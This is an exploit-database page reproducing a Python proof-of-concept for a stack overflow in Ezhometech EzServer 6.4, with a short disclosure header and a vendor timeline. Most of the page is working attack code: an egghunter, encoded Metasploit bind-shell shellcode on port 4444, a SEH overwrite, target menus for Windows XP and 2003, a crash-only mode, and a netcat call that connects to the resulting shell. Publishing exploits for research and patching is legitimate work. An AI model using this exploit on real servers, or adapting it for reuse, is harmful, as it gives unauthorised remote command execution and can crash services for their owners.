Vulners
Lucene search
Ezhometech Ezserver 6.4 Stack Overflow Exploit
# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/
### Software Description
# EZserver is a Video Server that stream Full HD to various devices.
### Vulnerability Details
# Buffer overflow condition exist in URL handling, sending long GET request
# will cause server process to exit and may allow malicious code injection.
# Further research found that the application does not care about the HTTP method,
# so that by sending long characters will make the program crash.
### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.
#!/usr/bin/python
import sys
import struct
from socket import *
from os import system
from time import sleep
hunt = (
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444,
shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"
"\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"
"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"
"\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"
"\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"
"\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"
"\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"
"\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"
"\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"
"\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"
"\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"
"\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"
"\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"
"\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"
"\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"
"\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"
"\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"
"\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"
"\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"
"\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"
"\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"
"\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"
"\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"
"\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"
"\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"
"\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"
"\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"
"\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"
"\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"
"\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"
"\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"
"\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"
"\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"
"\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"
"\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"
"\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"
"\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"
"\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"
"\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"
"\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"
"\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")
junk1 = "\x41" * 5025
junk2 = "\x42" * 5029
junk3 = "\x43" * 10000
buff = "w00tw00t"
buff+= shellcode
buff+= "\x90" * 100
buff+= "\xeb\x08\x90\x90"
buff+= struct.pack('<L', 0x10212779)
buff+= "\x90" * 16
buff+= hunt
buff+= "\x44" * 5000
def winxp():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk1+buff
s.send (payload)
s.close()
print "[+] Wait for hunter.."
sleep(5)
print "[+] Connecting to target shell!"
sleep(2)
system("nc -v %s 4444" %host)
except:
print "[x] Could not connect to the server x_x"
sys.exit()
def win2k3():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk2+buff
s.send(payload)
s.close()
print "[+] Wait for hunter.."
sleep(5)
print "[+] Connecting to target shell!"
sleep(1)
system("nc -v %s 4444" %host)
except:
print "[x] Could not connect to the server x_x"
sys.exit()
def crash():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk3
s.send (payload)
s.close()
print "[+] Server should be crashed! Check your debugger"
except:
print "[x] Could not connect to the server x_x"
sys.exit()
print "#################################################################"
print "# EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit #"
print "# by modpr0be[at]spentera | @modpr0be #"
print "# thanks to: otoy, cikumel, y0k | @spentera #"
print "================================================================="
print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "\t3.Crash only (debug)\n"
a = 0
while a < 3:
a = a + 1
op = input ("[!] Choose your target OS: ")
if op == 1:
winxp()
sys.exit()
elif op == 2:
win2k3()
sys.exit()
elif op == 3:
crash()
sys.exit()
else:
print "[-] Oh plz.. pick the right one :)\r\n"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1